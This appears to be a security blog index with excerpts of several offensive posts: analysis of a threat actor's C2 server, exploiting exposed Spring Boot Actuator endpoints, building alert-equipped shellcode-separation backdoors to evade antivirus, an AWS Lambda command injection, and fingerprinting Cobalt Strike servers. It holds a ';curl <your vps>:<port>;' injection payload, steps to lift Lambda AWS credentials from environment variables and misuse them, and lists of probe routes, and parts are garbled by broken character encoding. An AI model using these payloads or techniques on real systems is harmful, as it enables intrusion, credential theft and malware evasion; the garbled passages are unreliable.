wubba lubba dub dub.
post @ 2021-07-29

SilverFish_TLPWHITE

Starting point

According to the IOCs published by FireEye, one of the domains is databasegalore.com. The IP behind that domain runs a PowerMTA service on port 2304, and a web directory scan turned up example.php. Using the device fingerprints of these two pages together with the PowerMTA service, the PTI team scanned the entire IPv4 address space and found one IP address, 81.4.122.203. The PTI team then ran a penetration test against that IP's /24 and found a C2 server at 81.4.122.101.

C2 analysis

The information collected is as follows:

  • ID
  • UUID
  • Instance
  • IP
  • Country
  • Domain\User@Computer
  • OS
  • Build
  • Architecture
  • Antivirus
  • Is Admin
  • Integrity Level
  • UAC Setting
  • ConsentPromptBehaviorAdmin / PromptOnSecureDesktop
  • First visit

Attack commands can be sent from each victim's page; they are listed below:

Looking through them, command execution and UAC bypass are the most common. The C2 server's protective measures are as follows:

  • AppArmor is used to isolate the environment
  • Access logging is disabled (web logs, SSH login logs, command-line history)
  • iptables allows access only from whitelisted IPs
Read More

0x01. Basics

  1. pom.xml contains a configuration like this:

<dependency>
   <groupId>org.springframework.boot</groupId>
   <artifactId>spring-boot-starter-actuator</artifactId>
   <exclusions>
  2. Security settings are not enabled:
management:
  security:
    enabled: false
  health:
    elasticsearch:
      enabled: false
  metrics:
    export:
      prometheus:
        enabled: true
      jmx:
        enabled: true
  endpoints:
    web:
      exposure:
        include: '*'
      base-path: /auto

The server side can change the Actuator root path by editing the configuration file: management.endpoints.web.base-path=/monitor

Searching source code on GitHub turns up similar settings:

0x02 Exploitation

When misconfigured, the following routes may be exposed:

/actuator
/auditevents
/autoconfig
/beans
/caches
/conditions
/configprops
/docs
/dump
/env
/flyway
/health
/heapdump
/httptrace
/info
/integrationgraph
/jolokia
/logfile
/loggers
/liquibase
/metrics
/mappings
/prometheus
/refresh
/scheduledtasks
/sessions
/shutdown
/trace
/threaddump
/actuator/auditevents
/actuator/beans
/actuator/health
/actuator/conditions
/actuator/configprops
/actuator/env
/actuator/info
/actuator/loggers
/actuator/heapdump
/actuator/threaddump
/actuator/metrics
/actuator/scheduledtasks
/actuator/httptrace
/actuator/mappings
/actuator/jolokia
/actuator/hystrix.stream
Read More

Background and requirements

Whatever form a backdoor takes (scheduled task, DLL hijacking, autostart entry, ...), when a backdoor I planted runs I want to know its check-in context: start time, triggering IP and so on. So this article is an experimental extension built on top of shellcode-separation AV evasion.

Consider these scenarios:

  • 鍚庨棬琚潤鎬佸垎鏋
  • 鍚庨棬琚姩鎬佸垎鏋
  • shellcode琚彁鍙栦箣鍚庤Е鍙

Extending shellcode-separation evasion is fairly easy: when the client requests the remote shellcode hosting server, add a bot that sends a check-in notification (If This Then That). That is too simple, though, so let's add some more, for example:

  1. When the shellcode URL is requested without valid parameters, raise an alert
  2. When the trojan is running in a hostile environment, raise an alert
    • when the trojan's check-in IP is not in the server-side list
    • when the device fingerprint of the check-in host is not in the server-side list
  3. The shellcode hosting service can be switched off and on at any time
  4. The shellcode hosting service can add or remove trojan check-in IPs or device fingerprints at any time

Materials

  • One VPS: hosts the shellcode and notifies the Slack bot
  • One AWS account to hide the C2 (CloudFront)
  • Slack: receives the notifications; Slash commands are used to control the shellcode hosting service

Shellcode hosting workflow

Read More

Vulnerability

During testing I found the following code in an AWS Lambda function; it is obviously vulnerable to command injection:

execute_command = "ffmpeg -i " + video_url + " -y -f " + img_format + " -ss " + time_index + " -vframes 1 " + WH + " " + output_path
print(execute_command)
cp = subprocess.run(execute_command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)

Attack payload: ;curl <your vps>:<port>; . A listener on your own server then receives a request originating from the Lambda container.

淇浠g爜:
cp = subprocess.run(["ffmpeg", "-i", video_url, "-y", "-f", img_format, "-ss", time_index, "-vframes", "1", output_path], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
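As an added example (not code from the post), the Python below shows why the fix works: it tokenises the original concatenated command the way a POSIX shell does with shell=True, so the ";" in the page's payload splits off a second command, whereas the argv-list form hands each untrusted value to ffmpeg as a single argument. Allow-list validation is placed in front of it; the vps.example:4444 host, ALLOWED_FORMATS and the size option standing in for the original WH variable are constructed assumptions.

```python
import shlex
from urllib.parse import urlparse

# Constructed payload modelled on the page's ";curl <your vps>:<port>;"
# (vps.example:4444 is a placeholder, not a real host).
PAYLOAD_URL = ";curl vps.example:4444;"
ALLOWED_FORMATS = {"image2", "png", "mjpeg"}   # assumed allow-list of frame formats


def shell_tokens(cmd):
    """Tokenise a command string the way a POSIX shell does when shell=True
    is used: ';' terminates one command and starts another."""
    lex = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    return list(lex)


def vulnerable_command(video_url, img_format, time_index, output_path):
    """The page's string concatenation, returned instead of executed."""
    return ("ffmpeg -i " + video_url + " -y -f " + img_format + " -ss "
            + time_index + " -vframes 1 " + output_path)


def validate_inputs(video_url, img_format, time_index):
    """Allow-list validation of the three untrusted values; returns (ok, reason)."""
    parsed = urlparse(video_url)
    if parsed.scheme not in ("http", "https") or not parsed.netloc:
        return False, "video_url must be an http(s) URL"
    if img_format not in ALLOWED_FORMATS:
        return False, "img_format not in allow-list"
    try:
        float(time_index)
    except ValueError:
        return False, "time_index must be numeric"
    return True, ""


def build_ffmpeg_argv(video_url, img_format, time_index, output_path, size=None):
    """argv for subprocess.run(argv) without shell=True: every value is exactly
    one argument, so ';' reaches ffmpeg as data instead of the shell as syntax.
    `size` (assumed to be what the page's WH held, e.g. "640x480") is passed as
    its own -s option rather than spliced into a string."""
    ok, reason = validate_inputs(video_url, img_format, time_index)
    if not ok:
        raise ValueError(reason)
    argv = ["ffmpeg", "-i", video_url, "-y", "-f", img_format,
            "-ss", time_index, "-vframes", "1"]
    if size:
        argv += ["-s", size]
    argv.append(output_path)
    return argv
```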

Background knowledge

  • Lambda function code path: /var/task
  • Credentials: stored in environment variables, AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, AWS_SESSION_TOKEN
  • Filesystem: /var/task is read-only, /tmp is writable
  • Default user: sbx_userxxx
  • The maximum Lambda execution timeout is 15 minutes; the credentials expire after roughly 11 hours
  • Attacking Lambda only requires obtaining the AK, SK and Token; a reverse shell is not very meaningful

When command execution is available, first obtain the credentials, write them into the local awscli configuration file and operate through awscli. If the permissions granted when the Lambda was created were not restricted enough, awscli can then be used to manipulate all kinds of resources; for example, the command execution I found had permission to operate on every network interface under the main account, so the obtained credentials could be used to delete all network interfaces.

There is another case: when the obtained credentials have very limited permissions, every attempt returns "is not authorized to perform". The following queries show which permissions your credentials actually have. First, configure the command-line tool:

Read More

Background

A repository has appeared on GitHub that analyses the fingerprints of Cobalt Strike listening ports: https://github.com/Te-k/cobaltstrike. When CS listens on a stager port, it downloads and executes the payload via a URI, and that URI is generated by the following rule:

Finding domain fronting

After reading 360's cyberspace-mapping write-up, the first thing that came to mind was to use a mapping engine like fofa to search for the fingerprint, then pick out the C2s that have domain fronting configured and see what their original domains and the fronted domains look like, i.e. what everyone uses as their domain front :)

Quake mapping

Using the search conditions given by 360, first find a batch of IP addresses:

response:"HTTP/1.1 404 Not Found" AND response:"Content-Type: text/plain" AND response:"Content-Length: 0" AND NOT response:"Server: " AND NOT response:"Connection: " AND port: "443"   AND NOT country: "China"

淇敼鑴氭湰

淇敼濂戒箣鍚庣殑鑴氭湰鍜屾壂鎻忕粨鏋:https://github.com/JKme/cobaltstrike銆傛妸鍗曠嚎绋嬫敼涓哄绾跨▼锛屽啀澧炲姞涓涓幏鍙朓P鐨刪ttps璇佷功鍩熷悕鍑芥暟锛

Read More